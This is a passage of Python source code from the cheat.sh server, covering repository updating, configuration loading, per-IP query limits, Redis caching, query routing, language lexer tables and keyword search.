os.makedirs(parent) known_location = {k:v for k, v in known_location.items() if k not in existing_locations} _fetch_locations(known_location) def _update_adapter(adptr): """ Update implementation. If `adptr` returns no update_command(), it is being ignored. 
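The update sequence, as implemented below, is: run the adapter's
update_command() inside its local repository; read the new repository
state with current_state_command(); collect the list of changed files
via get_updates_list_command(); invalidate the corresponding cache
entries; and finally save the new state with save_state().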
""" os.chdir(adptr.local_repository_location()) cmd = adptr.update_command() if not cmd: return True errorcode, output = _run_cmd(cmd) if errorcode: _log("\nERROR:\n---%s\n" % output.decode("utf-8") + "\n---\nCould not update %s" % adptr) return False # Getting current repository state # This state will be saved after the update procedure is finished # (all cache entries invalidated) cmd = adptr.current_state_command() state = None if cmd: errorcode, state = _run_cmd(cmd) if errorcode: _log("\nERROR:\n---\n" + state + "\n---\nCould not get repository state: %s" % adptr) return False state = state.strip() # Getting list of files that were changed # that will be later converted to the list of the pages to be invalidated cmd = adptr.get_updates_list_command() updates = [] if cmd: errorcode, output = _run_cmd(cmd) output = output.decode("utf-8") if errorcode: _log("\nERROR:\n---\n" + output + "\n---\nCould not get list of pages to be updated: %s" % adptr) return False updates = output.splitlines() entries = adptr.get_updates_list(updates) if entries: _log("%s Entries to be updated: %s", adptr, len(entries)) name = adptr.name() for entry in entries: cache_name = name + ":" + entry _log("+ invalidating %s", cache_name) cache.delete(cache_name) if entries: _log("Done") adptr.save_state(state) return True def update_all(): """ Update all known repositories, mentioned in the adapters and fetched locally. If repository is not fetched, it is skipped. """ for adptr in adapter.adapter.all_adapters(): location = adptr.local_repository_location() if not location: continue if not os.path.exists(location): continue _update_adapter(adptr) def update_by_name(name): """ Find adapter by its `name` and update only it. """ pass def _show_usage(): sys.stdout.write(textwrap.dedent(""" Usage: python lib/fetch.py [command] Commands: update-all -- update all configured repositories update [name] -- update repository of the adapter `name` fetch-all -- fetch all configured repositories """)) def main(args): """ function for the initial repositories fetch and manual repositories updates """ if not args: _show_usage() sys.exit(0) logdir = os.path.dirname(CONFIG["path.log.fetch"]) if not os.path.exists(logdir): os.makedirs(logdir) logging.basicConfig( filename=CONFIG["path.log.fetch"], level=logging.DEBUG, format='%(asctime)s %(message)s') if args[0] == 'fetch-all': fetch_all() elif args[0] == 'update': update_by_name(sys.argv[1]) elif args[0] == 'update-all': update_all() else: _show_usage() sys.exit(0) if __name__ == '__main__': main(sys.argv[1:]) File: lib/options.py """ Parse query arguments. """ def parse_args(args): """ Parse arguments and options. Replace short options with their long counterparts. """ result = { 'add_comments': True, } query = "" newargs = {} for key, val in args.items(): if val == "" or val == [] or val == ['']: query += key continue if val == 'True': val = True if val == 'False': val = False newargs[key] = val options_meaning = { "c": dict(add_comments=False, unindent_code=False), "C": dict(add_comments=False, unindent_code=True), "Q": dict(remove_text=True), 'q': dict(quiet=True), 'T': {'no-terminal': True}, } for option, meaning in options_meaning.items(): if option in query: result.update(meaning) result.update(newargs) return result File: lib/post.py """ POST requests processing. Currently used only for new cheat sheets submission. 
Configuration parameters: path.spool """ import string import os import random from config import CONFIG def _save_cheatsheet(topic_name, cheatsheet): """ Save posted cheat sheet `cheatsheet` with `topic_name` in the spool directory """ nonce = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) filename = topic_name.replace('/', '.') + "." + nonce filename = os.path.join(CONFIG["path.spool"], filename) open(filename, 'w').write(cheatsheet) def process_post_request(req, topic): """ Process POST request `req`. """ for key, val in req.form.items(): if key == '': if topic is None: topic_name = "UNNAMED" else: topic_name = topic cheatsheet = val else: if val == '': if topic is None: topic_name = "UNNAMED" else: topic_name = topic cheatsheet = key else: topic_name = key cheatsheet = val _save_cheatsheet(topic_name, cheatsheet) File: lib/standalone.py """ Standalone wrapper for the cheat.sh server. """ from __future__ import print_function import sys import textwrap try: import urlparse except ModuleNotFoundError: import urllib.parse as urlparse import config config.CONFIG["cache.type"] = "none" import cheat_wrapper import options def show_usage(): """ Show how to use the program in the standalone mode """ print(textwrap.dedent(""" Usage: lib/standalone.py [OPTIONS] QUERY For OPTIONS see :help """)[1:-1]) def parse_cmdline(args): """ Parses command line arguments and returns query and request_options """ if not args: show_usage() sys.exit(0) query_string = " ".join(args) parsed = urlparse.urlparse("https://srv:0/%s" % query_string) request_options = options.parse_args( urlparse.parse_qs(parsed.query, keep_blank_values=True)) query = parsed.path.lstrip("/") if not query: query = ":firstpage" return query, request_options def main(args): """ standalone wrapper for cheat_wrapper() """ query, request_options = parse_cmdline(args) answer, _ = cheat_wrapper.cheat_wrapper(query, request_options=request_options) sys.stdout.write(answer) if __name__ == '__main__': main(sys.argv[1:]) File: lib/config.py """ Global configuration of the project. All configurable parameters are stored in the global variable CONFIG, the only variable which is exported from the module. Default values of all configuration parameters are specified in the `_CONFIG` dictionary. Those parameters can be overridden by three means: * config file `etc/config.yaml` located in the work dir * config file `etc/config.yaml` located in the project dir (if the work dir and the project dir are not the same) * environment variables prefixed with `CHEATSH_` Configuration placement priorities, from high to low: * environment variables; * configuration file in the workdir * configuration file in the project dir * default values specified in the `_CONFIG` dictionary If the work dir and the project dir are not the same, we do not recommend that you use the config file located in the project dir, except the cases when you use your own cheat.sh fork, and thus configuration is a part of the project repository. In all other cases `WORKDIR/etc/config.yaml` should be preferred. Location of this config file can be overridden by the `CHEATSH_PATH_CONFIG` environment variable. Configuration parameters set by environment variables are mapped in this way: * CHEATSH_ prefix is trimmed * _ replaced with . * the string is lowercased For instance, an environment variable named `CHEATSH_SERVER_PORT` specifies the value for the `server.port` configuration parameter. 
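For example (illustrative values only):

    export CHEATSH_PATH_WORKDIR=/tmp/cheat.sh   # overrides path.workdir
    export CHEATSH_CACHE_TYPE=none              # overrides cache.type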
Only parameters that imply scalar values (integer or string) can be set using environment variables, for the rest config files should be used. If a parameter implies an integer, and the value specified by an environment variable is not an integer, it is ignored. """ from __future__ import print_function import os from pygments.styles import get_all_styles #def get_all_styles(): # return [] _ENV_VAR_PREFIX = "CHEATSH" _MYDIR = os.path.abspath(os.path.join(__file__, '..', '..')) def _config_locations(): """ Return three possible config locations where configuration can be found: * `_WORKDIR`, `_CONF_FILE_WORKDIR`, `_CONF_FILE_MYDIR` """ var = _ENV_VAR_PREFIX + '_PATH_WORKDIR' workdir = os.environ[var] if var in os.environ \ else os.path.join(os.environ['HOME'], '.cheat.sh') var = _ENV_VAR_PREFIX + '_CONFIG' conf_file_workdir = os.environ[var] if var in os.environ \ else os.path.join(workdir, 'etc/config.yaml') conf_file_mydir = os.path.join(_MYDIR, 'etc/config.yaml') return workdir, conf_file_workdir, conf_file_mydir _WORKDIR, _CONF_FILE_WORKDIR, _CONF_FILE_MYDIR = _config_locations() _CONFIG = { "adapters.active": [ "tldr", "cheat", "fosdem", "translation", "rosetta", "late.nz", "question", "cheat.sheets", "cheat.sheets dir", "learnxiny", "rfc", "oeis", "chmod", ], "adapters.mandatory": [ "search", ], "cache.redis.db": 0, "cache.redis.host": "localhost", "cache.redis.port": 6379, "cache.redis.prefix": "", "cache.type": "redis", "frontend.styles": sorted(list(get_all_styles())), "log.level": 4, "path.internal.ansi2html": os.path.join(_MYDIR, "share/ansi2html.sh"), "path.internal.bin": os.path.join(_MYDIR, "bin"), "path.internal.bin.upstream": os.path.join(_MYDIR, "bin", "upstream"), "path.internal.malformed": os.path.join(_MYDIR, "share/static/malformed-response.html"), "path.internal.pages": os.path.join(_MYDIR, "share"), "path.internal.static": os.path.join(_MYDIR, "share/static"), "path.internal.templates": os.path.join(_MYDIR, "share/templates"), "path.internal.vim": os.path.join(_MYDIR, "share/vim"), "path.log.main": "log/main.log", "path.log.queries": "log/queries.log", "path.log.fetch": "log/fetch.log", "path.repositories": "upstream", "path.spool": "spool", "path.workdir": _WORKDIR, "routing.pre": [ ("^$", "search"), ("^[^/]*/rosetta(/|$)", "rosetta"), ("^rfc/", "rfc"), ("^oeis/", "oeis"), ("^chmod/", "chmod"), ("^:", "internal"), ("/:list$", "internal"), ("/$", "cheat.sheets dir"), ], "routing.main": [ ("", "cheat.sheets"), ("", "cheat"), ("", "tldr"), ("", "late.nz"), ("", "fosdem"), ("", "learnxiny"), ], "routing.post": [ ("^[^/ +]*$", "unknown"), ("^[a-z][a-z]-[a-z][a-z]$", "translation"), ], "routing.default": "question", "upstream.url": "https://cheat.sh", "upstream.timeout": 5, "search.limit": 20, "server.bind": "0.0.0.0", "server.port": 8002, } class Config(dict): """ configuration dictionary that handles relative paths properly (making them relative to path.workdir) """ def _absolute_path(self, val): if val.startswith('/'): return val return os.path.join(self['path.workdir'], val) def __init__(self, *args, **kwargs): dict.__init__(self) self.update(*args, **kwargs) def __setitem__(self, key, val): if key.startswith('path.') and not val.startswith('/'): val = self._absolute_path(val) dict.__setitem__(self, key, val) def update(self, *args, **kwargs): """ the built-in __init__ doesn't call update, and the built-in update doesn't call __setitem__, so `update` should be overridden """ newdict = dict(*args, **kwargs) if 'path.workdir' in newdict: self['path.workdir'] = 
newdict['path.workdir'] for key, val in newdict.items(): self[key] = val def _load_config_from_environ(config): update = {} for key, val in config.items(): if not isinstance(val, str) or isinstance(val, int): continue env_var = _ENV_VAR_PREFIX + '_' + key.replace('.', '_').upper() if not env_var in os.environ: continue env_val = os.environ[env_var] if isinstance(val, int): try: env_val = int(env_val) except (ValueError, TypeError): continue update[key] = env_val return update def _get_nested(data, key): """ Return value for a hierrachical key (like a.b.c). Return None if nothing found. If there is a key with . in the name, and a subdictionary, the former is preferred: >>> print(_get_nested({'a.b': 10, 'a':{'b': 20}}, 'a.b')) 10 >>> print(_get_nested({'a': {'b': 20}}, 'a.b')) 20 >>> print(_get_nested({'a': {'b': {'c': 30}}}, 'a.b.c')) 30 """ if not data or not isinstance(data, dict): return None if '.' not in key: return data.get(key) if key in data: return data[key] parts = key.split('.') for i in range(len(parts))[::-1]: prefix = ".".join(parts[:i]) if prefix in data: return _get_nested(data[prefix], ".".join(parts[i:])) return None def _load_config_from_file(default_config, filename): import yaml update = {} if not os.path.exists(filename): return update with open(filename) as f: newconfig = yaml.load(f.read(), Loader=yaml.SafeLoader) for key, val in default_config.items(): newval = _get_nested(newconfig, key) if newval is None: continue if isinstance(val, int): try: newval = int(newval) except (ValueError, TypeError): continue update[key] = newval return update CONFIG = Config() CONFIG.update(_CONFIG) CONFIG.update(_load_config_from_file(_CONFIG, _CONF_FILE_MYDIR)) if _CONF_FILE_WORKDIR != _CONF_FILE_MYDIR: CONFIG.update(_load_config_from_file(_CONFIG, _CONF_FILE_WORKDIR)) CONFIG.update(_load_config_from_environ(_CONFIG)) if __name__ == "__main__": import doctest doctest.testmod() File: lib/limits.py """ Connection limitation. Number of connections from one IP is limited. We have nothing against scripting and automated queries. Even the opposite, we encourage them. But there are some connection limits that even we can't handle. Currently the limits are quite restrictive, but they will be relaxed in the future. Usage: limits = Limits() not_allowed = limits.check_ip(ip_address) if not_allowed: return "ERROR: %s" % not_allowed """ import time from globals import log _WHITELIST = ['5.9.243.177'] def _time_caps(minutes, hours, days): return { 'min': minutes, 'hour': hours, 'day': days, } class Limits(object): """ Queries limitation (by IP). Exports: check_ip(ip_address) """ def __init__(self): self.intervals = ['min', 'hour', 'day'] self.divisor = _time_caps(60, 3600, 86400) self.limit = _time_caps(30, 600, 1000) self.last_update = _time_caps(0, 0, 0) self.counter = { 'min': {}, 'hour': {}, 'day': {}, } self._clear_counters_if_needed() def _log_visit(self, interval, ip_address): if ip_address not in self.counter[interval]: self.counter[interval][ip_address] = 0 self.counter[interval][ip_address] += 1 def _limit_exceeded(self, interval, ip_address): visits = self.counter[interval][ip_address] limit = self._get_limit(interval) return visits > limit def _get_limit(self, interval): return self.limit[interval] def _report_excessive_visits(self, interval, ip_address): log("%s LIMITED [%s for %s]" % (ip_address, self._get_limit(interval), interval)) def check_ip(self, ip_address): """ Check if `ip_address` is allowed, and if not raise an RuntimeError exception. 
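        The caps are defined in __init__: 30 queries per minute, 600 per hour
        and 1000 per day; whitelisted IPs are never limited.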
Return True otherwise """ if ip_address in _WHITELIST: return None self._clear_counters_if_needed() for interval in self.intervals: self._log_visit(interval, ip_address) if self._limit_exceeded(interval, ip_address): self._report_excessive_visits(interval, ip_address) return ("Not so fast! Number of queries per %s is limited to %s" % (interval, self._get_limit(interval))) return None def reset(self): """ Reset all counters for all IPs """ for interval in self.intervals: self.counter[interval] = {} def _clear_counters_if_needed(self): current_time = int(time.time()) for interval in self.intervals: if current_time // self.divisor[interval] != self.last_update[interval]: self.counter[interval] = {} self.last_update[interval] = current_time / self.divisor[interval] File: lib/globals.py """ Global functions that our used everywhere in the project. Please, no global variables here. For the configuration related things see `config.py` """ from __future__ import print_function import sys import logging def fatal(text): """ Fatal error function. The function is being used in the standalone mode only """ sys.stderr.write("ERROR: %s\n" % text) sys.exit(1) def error(text): """ Log error `text` and produce a RuntimeError exception """ if not text.startswith("Too many queries"): print(text) logging.error("ERROR %s", text) raise RuntimeError(text) def log(text): """ Log error `text` (if it does not start with 'Too many queries') """ if not text.startswith("Too many queries"): print(text) logging.info(text) File: lib/cache.py """ Cache implementation. Currently only two types of cache are allowed: * "none" cache switched off * "redis" use redis for cache Configuration parameters: cache.type = redis | none cache.redis.db cache.redis.host cache.redis.port """ import os import json from config import CONFIG _REDIS = None if CONFIG['cache.type'] == 'redis': import redis _REDIS = redis.Redis( host=CONFIG['cache.redis.host'], port=CONFIG['cache.redis.port'], db=CONFIG['cache.redis.db']) _REDIS_PREFIX = '' if CONFIG.get("cache.redis.prefix", ""): _REDIS_PREFIX = CONFIG["cache.redis.prefix"] + ":" def put(key, value): """ Save `value` with `key`, and serialize it if needed """ if _REDIS_PREFIX: key = _REDIS_PREFIX + key if CONFIG["cache.type"] == "redis" and _REDIS: if isinstance(value, (dict, list)): value = json.dumps(value) _REDIS.set(key, value) def get(key): """ Read `value` by `key`, and deserialize it if needed """ if _REDIS_PREFIX: key = _REDIS_PREFIX + key if CONFIG["cache.type"] == "redis" and _REDIS: value = _REDIS.get(key) try: value = json.loads(value) except (ValueError, TypeError): pass return value return None def delete(key): """ Remove `key` from the database """ if _REDIS: if _REDIS_PREFIX: key = _REDIS_PREFIX + key _REDIS.delete(key) return None File: lib/languages_data.py """ Programming languages information. Will be (probably) moved to a separate file/directory from the project tree. 
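Exports the mapping tables LEXER (section name -> Pygments lexer class),
LANGUAGE_ALIAS (alternative spellings -> canonical names), VIM_NAME and
SO_NAME (canonical names -> vim filetype / Stack Overflow tag), the
per-editor filetype maps (*_FT_NAME), and the helpers
rewrite_editor_section_name() and get_lexer_name().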
""" import pygments.lexers LEXER = { "assembly" : pygments.lexers.NasmLexer, "awk" : pygments.lexers.AwkLexer, "bash" : pygments.lexers.BashLexer, "basic" : pygments.lexers.QBasicLexer, "bf" : pygments.lexers.BrainfuckLexer, "chapel" : pygments.lexers.ChapelLexer, "clojure" : pygments.lexers.ClojureLexer, "coffee" : pygments.lexers.CoffeeScriptLexer, "cpp" : pygments.lexers.CppLexer, "c" : pygments.lexers.CLexer, "csharp" : pygments.lexers.CSharpLexer, "d" : pygments.lexers.DLexer, "dart" : pygments.lexers.DartLexer, "delphi" : pygments.lexers.DelphiLexer, "elisp" : pygments.lexers.EmacsLispLexer, "elixir" : pygments.lexers.ElixirLexer, "elm" : pygments.lexers.ElmLexer, "erlang" : pygments.lexers.ErlangLexer, "factor" : pygments.lexers.FactorLexer, "forth" : pygments.lexers.ForthLexer, "fortran" : pygments.lexers.FortranLexer, "fsharp" : pygments.lexers.FSharpLexer, "git" : pygments.lexers.BashLexer, "go" : pygments.lexers.GoLexer, "groovy" : pygments.lexers.GroovyLexer, "haskell" : pygments.lexers.HaskellLexer, "java" : pygments.lexers.JavaLexer, "js" : pygments.lexers.JavascriptLexer, "julia" : pygments.lexers.JuliaLexer, "kotlin" : pygments.lexers.KotlinLexer, "latex" : pygments.lexers.TexLexer, "lisp" : pygments.lexers.CommonLispLexer, "lua" : pygments.lexers.LuaLexer, "mathematica": pygments.lexers.MathematicaLexer, "matlab" : pygments.lexers.MatlabLexer, "mongo" : pygments.lexers.JavascriptLexer, "nim" : pygments.lexers.NimrodLexer, "objective-c": pygments.lexers.ObjectiveCppLexer, "ocaml" : pygments.lexers.OcamlLexer, "octave" : pygments.lexers.OctaveLexer, "perl" : pygments.lexers.PerlLexer, "perl6" : pygments.lexers.Perl6Lexer, "php" : pygments.lexers.PhpLexer, "psql" : pygments.lexers.PostgresLexer, "python" : pygments.lexers.PythonLexer, "python3" : pygments.lexers.Python3Lexer, "r" : pygments.lexers.SLexer, "racket" : pygments.lexers.RacketLexer, "ruby" : pygments.lexers.RubyLexer, "rust" : pygments.lexers.RustLexer, "solidity" : pygments.lexers.JavascriptLexer, "scala" : pygments.lexers.ScalaLexer, "scheme": pygments.lexers.SchemeLexer, "psql" : pygments.lexers.SqlLexer, "sql" : pygments.lexers.SqlLexer, "swift" : pygments.lexers.SwiftLexer, "tcl" : pygments.lexers.TclLexer, "tcsh" : pygments.lexers.TcshLexer, "vb" : pygments.lexers.VbNetLexer, "vbnet" : pygments.lexers.VbNetLexer, "vim" : pygments.lexers.VimLexer, # experimental "arduino": pygments.lexers.ArduinoLexer, "pike" : pygments.lexers.PikeLexer, "eiffel" : pygments.lexers.EiffelLexer, "clean" : pygments.lexers.CleanLexer, "dylan" : pygments.lexers.DylanLexer, # not languages "cmake" : pygments.lexers.CMakeLexer, "django" : pygments.lexers.PythonLexer, "flask" : pygments.lexers.PythonLexer, } # canonical names are on the right side LANGUAGE_ALIAS = { 'asm' : 'assembly', 'assembler' : 'assembly', 'c++' : 'cpp', 'c#' : 'csharp', 'clisp' : 'lisp', 'coffeescript': 'coffee', 'cplusplus' : 'cpp', 'dlang' : 'd', 'f#' : 'fsharp', 'golang' : 'go', 'javascript': 'js', 'objc' : 'objective-c', 'p6' : 'perl6', 'sh' : 'bash', 'visualbasic': 'vb', 'vba' : 'vb', 'wolfram' : 'mathematica', 'mma' : 'mathematica', 'wolfram-mathematica': 'mathematica', 'm' : 'octave', } VIM_NAME = { 'assembly' : 'asm', 'bash' : 'sh', 'coffeescript': 'coffee', 'csharp' : 'cs', 'delphi' : 'pascal', 'dlang' : 'd', 'elisp' : 'newlisp', 'latex' : 'tex', 'forth' : 'fs', 'nim' : 'nimrod', 'perl6' : 'perl', 'python3' : 'python', 'python-3.x': 'python', 'tcsh' : 'sh', 'solidity' : 'js', 'mathematica': 'mma', 'wolfram-mathematica': 'mma', 'psql' : 'sql', # not 
languages 'cmake' : 'sh', 'git' : 'sh', 'django' : 'python', 'flask' : 'python', } SO_NAME = { 'coffee' : 'coffeescript', 'js' : 'javascript', 'python3' : 'python-3.x', 'vb' : 'vba', 'mathematica': 'wolfram-mathematica', } # # conversion of internal programmin language names # into canonical cheat.sh names # ATOM_FT_NAME = { } EMACS_FT_NAME = { "asm-mode" : "asm", "awk-mode" : "awk", "sh-mode" : "bash", # basic "brainfuck-mode" : "bf", # chapel "clojure-mode" : "clojure", "coffee-mode" : "coffee", "c++-mode" : "cpp", "c-mode" : "c", "csharp-mode" : "csharp", "d-mode" : "d", "dart-mode" : "dart", "dylan-mode" : "dylan", "delphi-mode" : "delphi", "emacs-lisp-mode" : "elisp", # elixir "elm-mode" : "elm", "erlang-mode" : "erlang", # factor "forth-mode" : "forth", "fortran-mode" : "fortran", "fsharp-mode" : "fsharp", "go-mode" : "go", "groovy-mode" : "groovy", "haskell-mode" : "haskell", # "hy-mode" "java-mode" : "java", "js-jsx-mode" : "js", "js-mode" : "js", "js2-jsx-mode" : "js", "js2-mode" : "js", "julia-mode" : "julia", "kotlin-mode" : "kotlin", "lisp-interaction-mode": "lisp", "lisp-mode" : "lisp", "lua-mode" : "lua", # mathematica "matlab-mode" : "matlab", # mongo "objc-mode" : "objective-c", # ocaml "perl-mode" : "perl", "perl6-mode" : "perl6", "php-mode" : "php", # psql "python-mode" : "python", # python3 # r -- ess looks it, but I don't know the mode name off hand "racket-mode" : "racket", "ruby-mode" : "ruby", "rust-mode" : "rust", "solidity-mode" : "solidity", "scala-mode" : "scala", "scheme-mode" : "scheme", "sql-mode" : "sql", "swift-mode" : "swift", "tcl-mode" : "tcl", # tcsh "visual-basic-mode" : "vb", # vbnet # vim } SUBLIME_FT_NAME = { } VIM_FT_NAME = { 'asm': 'assembler', 'javascript': 'js', 'octave': 'matlab', } VSCODE_FT_NAME = { } def rewrite_editor_section_name(section_name): """ section name cen be specified in form "editor:editor-filetype" and it will be rewritten into form "filetype" basing on the editor filetypes names data. 
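    For example, "emacs:js2-mode" is rewritten to "js" (via EMACS_FT_NAME)
    and "vim:octave" to "matlab" (via VIM_FT_NAME).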
If editor name is unknown, it is just cut off: notepad:js => js Known editors: * atom * vim * emacs * sublime * vscode >>> rewrite_editor_section_name('js') 'js' >>> rewrite_editor_section_name('vscode:js') 'js' """ if ':' not in section_name: return section_name editor_name, section_name = section_name.split(':', 1) editor_name_mapping = { 'atom': ATOM_FT_NAME, 'emacs': EMACS_FT_NAME, 'sublime': SUBLIME_FT_NAME, 'vim': VIM_FT_NAME, 'vscode': VSCODE_FT_NAME, } if editor_name not in editor_name_mapping: return section_name return editor_name_mapping[editor_name].get(section_name, section_name) def get_lexer_name(section_name): """ Rewrite `section_name` for the further lexer search (for syntax highlighting) """ if ':' in section_name: section_name = rewrite_editor_section_name(section_name) return LANGUAGE_ALIAS.get(section_name, section_name) if __name__ == "__main__": import doctest doctest.testmod() File: lib/stateful_queries.py """ Support for the stateful queries """ import cache def save_query(client_id, query): """ Save the last query `query` for the client `client_id` """ cache.put("l:%s" % client_id, query) def last_query(client_id): """ Return the last query for the client `client_id` """ return cache.get("l:%s" % client_id) File: lib/buttons.py TWITTER_BUTTON = """ <a href="https://twitter.com/igor_chubin" class="twitter-follow-button" data-show-count="false" data-button="grey">Follow @igor_chubin</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> """ GITHUB_BUTTON = """ <!-- Place this tag where you want the button to render. --> <a aria-label="Star chubin/wttr.in on GitHub" data-count-aria-label="# stargazers on GitHub" data-count-api="/repos/chubin/cheat.sh#stargazers_count" data-count-href="/chubin/cheat.sh/stargazers" data-icon="octicon-star" href="https://github.com/chubin/cheat.sh" class="github-button">cheat.sh</a> """ GITHUB_BUTTON_2 = """ <!-- Place this tag where you want the button to render. --> <a aria-label="Star chubin/cheat.sheets on GitHub" data-count-aria-label="# stargazers on GitHub" data-count-api="/repos/chubin/cheat.sheets#stargazers_count" data-count-href="/chubin/cheat.sheets/stargazers" data-icon="octicon-star" href="https://github.com/chubin/cheat.sheets" class="github-button">cheat.sheets</a> """ GITHUB_BUTTON_FOOTER = """ <!-- Place this tag right after the last button or just before your close body tag. --> <script async defer id="github-bjs" src="https://buttons.github.io/buttons.js"></script> """ File: lib/routing.py """ Queries routing and caching. Exports: get_topics_list() get_answers() """ import random import re from typing import Any, Dict, List import cache import adapter.cheat_sheets import adapter.cmd import adapter.internal import adapter.latenz import adapter.learnxiny import adapter.question import adapter.rosetta from config import CONFIG class Router(object): """ Implementation of query routing. Routing is based on `routing_table` and the data exported by the adapters (functions `get_list()` and `is_found()`). `get_topics_list()` returns available topics (accessible at /:list). `get_answer_dict()` return answer for the query. 
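    The routing table is assembled in __init__ from CONFIG["routing.pre"],
    CONFIG["routing.main"] and CONFIG["routing.post"]; if no pattern matches
    a topic, CONFIG["routing.default"] is used (see get_topic_type()).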
""" def __init__(self): self._cached_topics_list = [] self._cached_topic_type = {} adapter_class = adapter.all_adapters(as_dict=True) active_adapters = set(CONFIG['adapters.active'] + CONFIG['adapters.mandatory']) self._adapter = { "internal": adapter.internal.InternalPages( get_topic_type=self.get_topic_type, get_topics_list=self.get_topics_list), "unknown": adapter.internal.UnknownPages( get_topic_type=self.get_topic_type, get_topics_list=self.get_topics_list), } for by_name in active_adapters: if by_name not in self._adapter: self._adapter[by_name] = adapter_class[by_name]() self._topic_list = { key: obj.get_list() for key, obj in self._adapter.items() } self.routing_table = CONFIG["routing.main"] self.routing_table = CONFIG["routing.pre"] + self.routing_table + CONFIG["routing.post"] def get_topics_list(self, skip_dirs=False, skip_internal=False): """ List of topics returned on /:list """ if self._cached_topics_list: return self._cached_topics_list skip = ['fosdem'] if skip_dirs: skip.append("cheat.sheets dir") if skip_internal: skip.append("internal") sources_to_merge = [x for x in self._adapter if x not in skip] answer = {} for key in sources_to_merge: answer.update({name:key for name in self._topic_list[key]}) answer = sorted(set(answer.keys())) self._cached_topics_list = answer return answer def get_topic_type(self, topic: str) -> List[str]: """ Return list of topic types for `topic` or ["unknown"] if topic can't be determined. """ def __get_topic_type(topic: str) -> List[str]: result = [] for regexp, route in self.routing_table: if re.search(regexp, topic): if route in self._adapter: if self._adapter[route].is_found(topic): result.append(route) else: result.append(route) if not result: return [CONFIG["routing.default"]] # cut the default route off, if there are more than one route found if len(result) > 1: return result[:-1] return result if topic not in self._cached_topic_type: self._cached_topic_type[topic] = __get_topic_type(topic) return self._cached_topic_type[topic] def _get_page_dict(self, query, topic_type, request_options=None): """ Return answer_dict for the `query`. """ return self._adapter[topic_type]\ .get_page_dict(query, request_options=request_options) def handle_if_random_request(self, topic): """ Check if the `query` is a :random one, if yes we check its correctness and then randomly select a topic, based on the provided prefix. """ def __select_random_topic(prefix, topic_list): #Here we remove the special cases cleaned_topic_list = [ x for x in topic_list if '/' not in x and ':' not in x] #Here we still check that cleaned_topic_list in not empty if not cleaned_topic_list: return prefix random_topic = random.choice(cleaned_topic_list) return prefix + random_topic if topic.endswith('/:random') or topic.lstrip('/') == ':random': #We strip the :random part and see if the query is valid by running a get_topics_list() if topic.lstrip('/') == ':random' : topic = topic.lstrip('/') prefix = topic[:-7] topic_list = [x[len(prefix):] for x in self.get_topics_list() if x.startswith(prefix)] if '' in topic_list: topic_list.remove('') if topic_list: # This is a correct formatted random query like /cpp/:random as the topic_list is not empty. random_topic = __select_random_topic(prefix, topic_list) return random_topic else: # This is a wrongly formatted random query like /xyxyxy/:random as the topic_list is empty # we just strip the /:random and let the already implemented logic handle it. 
wrongly_formatted_random = topic[:-8] return wrongly_formatted_random #Here if not a random requst, we just forward the topic return topic def get_answers(self, topic: str, request_options:Dict[str, str] = None) -> List[Dict[str, Any]]: """ Find cheat sheets for the topic. Args: `topic` (str): the name of the topic of the cheat sheet Returns: [answer_dict]: list of answers (dictionaries) """ # if topic specified as <topic_type>:<topic>, # cut <topic_type> off topic_type = "" if re.match("[^/]+:", topic): topic_type, topic = topic.split(":", 1) topic = self.handle_if_random_request(topic) topic_types = self.get_topic_type(topic) # if topic_type is specified explicitly, # show pages only of that type if topic_type and topic_type in topic_types: topic_types = [topic_type] # 'question' queries are pretty expensive, that's why they should be handled # in a special way: # we do not drop the old style cache entries and try to reuse them if possible if topic_types == ['question']: answer = cache.get('q:' + topic) if answer: if isinstance(answer, dict): return [answer] return [{ 'topic': topic, 'topic_type': 'question', 'answer': answer, 'format': 'text+code', }] answer = self._get_page_dict(topic, topic_types[0], request_options=request_options) if answer.get("cache", True): cache.put('q:' + topic, answer) return [answer] # Try to find cacheable queries in the cache. # If answer was not found in the cache, resolve it in a normal way and save in the cache answers = [] for topic_type in topic_types: cache_entry_name = f"{topic_type}:{topic}" cache_needed = self._adapter[topic_type].is_cache_needed() if cache_needed: answer = cache.get(cache_entry_name) if not isinstance(answer, dict): answer = None if answer: answers.append(answer) continue answer = self._get_page_dict(topic, topic_type, request_options=request_options) if isinstance(answer, dict): if "cache" in answer: cache_needed = answer["cache"] if cache_needed and answer: cache.put(cache_entry_name, answer) answers.append(answer) return answers # pylint: disable=invalid-name _ROUTER = Router() get_topics_list = _ROUTER.get_topics_list get_answers = _ROUTER.get_answers File: lib/cheat_wrapper_test.py from cheat_wrapper import _add_section_name unchanged = """ python/:list ls + g++ g/+ clang++ btrfs~volume :intro :cht.sh python/copy+file python/rosetta/:list emacs:go-mode/:list g++g++ """ split = """ python copy file python/copy file python file python/file python+file python/file g++ -O1 g++/-O1 """ def test_header_split(): for inp in unchanged.strip().splitlines(): assert inp == _add_section_name(inp) for test in split.strip().split('\n\n'): inp, outp = test.split('\n') assert outp == _add_section_name(inp) File: lib/search.py """ Very naive search implementation. Just a placeholder. Exports: find_answer_by_keyword() It should be implemented on the adapter basis: 1. adapter.search(keyword) returns list of matching answers * maybe with some initial weight 2. ranking is done 3. sorted results are returned 4. eage page are cut by keyword 5. 
results are paginated Configuration parameters: search.limit """ import re from config import CONFIG from routing import get_answers, get_topics_list def _limited_entry(): return { 'topic_type': 'LIMITED', "topic": "LIMITED", 'answer': "LIMITED TO %s ANSWERS" % CONFIG['search.limit'], 'format': "code", } def _parse_options(options): """Parse search options string into optiond_dict """ if options is None: return {} search_options = { 'insensitive': 'i' in options, 'word_boundaries': 'b' in options, 'recursive': 'r' in options, } return search_options def match(paragraph, keyword, options=None, options_dict=None): """Search for each keyword from `keywords` in `page` and if all of them are found, return `True`. Otherwise return `False`. Several keywords can be joined together using ~ For example: ~ssh~passphrase """ if keyword is None: return True if '~' in keyword: keywords = keyword.split('~') else: keywords = [keyword] if options_dict is None: options_dict = _parse_options(options) for kwrd in keywords: if not kwrd: continue regex = re.escape(kwrd) if options_dict["word_boundaries"]: regex = r"\b%s\b" % kwrd if options_dict["insensitive"]: if not re.search(regex, paragraph, re.IGNORECASE): return False else: if not re.search(regex, paragraph): return False return True def find_answers_by_keyword(directory, keyword, options="", request_options=None): """ Search in the whole tree of all cheatsheets or in its subtree `directory` by `keyword` """ options_dict = _parse_options(options) answers_found = [] for topic in get_topics_list(skip_internal=True, 